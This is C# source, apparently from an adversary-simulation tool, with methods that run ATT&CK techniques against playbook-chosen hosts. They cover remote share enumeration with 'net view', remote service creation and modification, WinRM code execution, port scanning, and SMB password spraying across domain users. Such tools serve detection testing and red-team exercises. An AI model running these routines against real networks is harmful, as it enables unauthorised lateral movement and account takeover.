public static void NetworkShareEnumerationCmdRemote(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1135"); logger.TimestampInfo("Using the command line to execute the technique"); try { List <Computer> target_hosts = Targets.GetHostTargets(playbook_task, logger); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each network scan", playbook_task.task_sleep)); } foreach (Computer computer in target_hosts) { ExecutionHelper.StartProcessApi("", String.Format("net view \\\\{0}", computer.IPv4), logger); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void CreateRemoteServiceOnHosts(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1021.002"); if (playbook_task.variation == 1) { logger.TimestampInfo("Using sc.exe to execute this technique against remote hosts"); } else if (playbook_task.variation == 2) { logger.TimestampInfo("Using the Win32 API CreateService function to execute this technique against remote hosts"); } List <Computer> host_targets = new List <Computer>(); List <Task> tasklist = new List <Task>(); if (playbook_task.serviceName.Equals("random")) { string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789".ToLower(); Random random = new Random(); logger.TimestampInfo("Using random Service Name"); playbook_task.serviceName = new string(Enumerable.Repeat(chars, 8).Select(s => s[random.Next(s.Length)]).ToArray()); } try { host_targets = Targets.GetHostTargets(playbook_task, logger); foreach (Computer computer in host_targets) { Computer temp = computer; if (!computer.ComputerName.ToUpper().Contains(Environment.MachineName.ToUpper())) { tasklist.Add(Task.Factory.StartNew(() => { if (playbook_task.variation == 1) { LateralMovementHelper.CreateRemoteServiceCmdline(temp, playbook_task, logger); } else if (playbook_task.variation == 2) { LateralMovementHelper.CreateRemoteServiceApi(temp, playbook_task, logger); } })); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void WinRmCodeExec(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1021.006"); if (playbook_task.variation == 1) { logger.TimestampInfo("Using powershell.exe to execute this technique against remote hosts"); } else if (playbook_task.variation == 2) { logger.TimestampInfo("Using the System.Management.Automation .NET namespace to execute this technique"); } List <Computer> host_targets = new List <Computer>(); List <Task> tasklist = new List <Task>(); try { host_targets = Targets.GetHostTargets(playbook_task, logger); foreach (Computer computer in host_targets) { Computer temp = computer; if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { tasklist.Add(Task.Factory.StartNew(() => { if (playbook_task.variation == 1) { LateralMovementHelper.WinRMCodeExecutionPowerShell(temp, playbook_task, logger); } else if (playbook_task.variation == 2) { LateralMovementHelper.WinRMCodeExecutionNET(temp, playbook_task, logger); } })); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void NetworkServiceDiscovery(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1046"); logger.TimestampInfo("Using the System.Net.Sockets .NET namespace to execute this technique"); try { List <Task> tasklist = new List <Task>(); List <Computer> target_hosts = Targets.GetHostTargets(playbook_task, logger); //logger.TimestampInfo(String.Format("Obtained {0} target computers for the scan", target_hosts.Count)); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each network scan", playbook_task.task_sleep)); } foreach (Computer computer in target_hosts) { //if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) //{ Computer temp = computer; TimeSpan interval = TimeSpan.FromSeconds(5); tasklist.Add(Task.Factory.StartNew(() => { logger.TimestampInfo(String.Format("Starting port scan against {0} ({1})", temp.ComputerName, temp.IPv4)); DiscoveryHelper.PortScan(temp, interval, playbook_task.ports, logger); })); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } //} } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ModifyRemoteServiceOnHosts(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1021.002"); logger.TimestampInfo("Using the Win32 API CreateService function to execute this technique against remote hosts"); List <Computer> host_targets = new List <Computer>(); List <Task> tasklist = new List <Task>(); try { host_targets = Targets.GetHostTargets(playbook_task, logger); foreach (Computer computer in host_targets) { Computer temp = computer; if (!computer.ComputerName.ToUpper().Contains(Environment.MachineName.ToUpper())) { //LateralMovementHelper.ModifyRemoteServiceApi(temp, playbook_task, logger); tasklist.Add(Task.Factory.StartNew(() => { LateralMovementHelper.ModifyRemoteServiceApi(temp, playbook_task, logger); })); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void NetworkShareEnumerationApiRemote(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1135"); logger.TimestampInfo("Using the Win32 API NetShareEnum function to execute this technique"); try { //List<Computer> targetcomputers = Lib.Targets.GetHostTargets_old(computertype, nhosts, logger); List <Task> tasklist = new List <Task>(); List <Computer> target_hosts = Targets.GetHostTargets(playbook_task, logger); if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each enumeration attempt", playbook_task.task_sleep)); } foreach (Computer computer in target_hosts) { if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper())) { tasklist.Add(Task.Factory.StartNew(() => { DiscoveryHelper.ShareEnum(computer, logger); })); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } } Task.WaitAll(tasklist.ToArray()); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RemoteDomainPasswordSpray(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1110.003"); logger.TimestampInfo(String.Format("Remote Domain Brute Force using the WNetAddConnection2 Win32 API function")); bool Kerberos = false; List <Computer> host_targets = new List <Computer>(); List <User> user_targets = new List <User>(); List <Task> tasklist = new List <Task>(); string domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; try { if (playbook_task.user_target_type == 99) { domain = "."; } // Executing a remote authentication with Kerberos will not connect to the remote host, just the DC. Kerberos = false; host_targets = Targets.GetHostTargets(playbook_task, logger); user_targets = Targets.GetUserTargets(playbook_task, logger); //if (playbook_task.protocol.ToUpper().Equals("NTLM")) Kerberos = false; if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } if (playbook_task.host_target_type == 1 || playbook_task.host_target_type == 2) { //Remote spray against one target host //Target host either explictly defined in the playbook or randomly picked using LDAP queries foreach (User user in user_targets) { User tempuser = user; //int tempindex = index; //if (playbook_task.task_sleep > 0 && tempindex > 0) Thread.Sleep(playbook_task.task_sleep * 1000); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(host_targets[0], domain, tempuser.UserName, playbook_task.spray_password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } else if (playbook_task.host_target_type == 3 || playbook_task.host_target_type == 4) { //Remote spray against several hosts, distributed //Target hosts either explictly defined in the playbook or randomly picked using LDAP queries int loops; if (user_targets.Count >= host_targets.Count) { loops = host_targets.Count; } else { loops = user_targets.Count; } for (int i = 0; i < loops; i++) { int temp = i; if (playbook_task.task_sleep > 0 && temp > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(host_targets[temp], domain, user_targets[temp].UserName, playbook_task.spray_password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }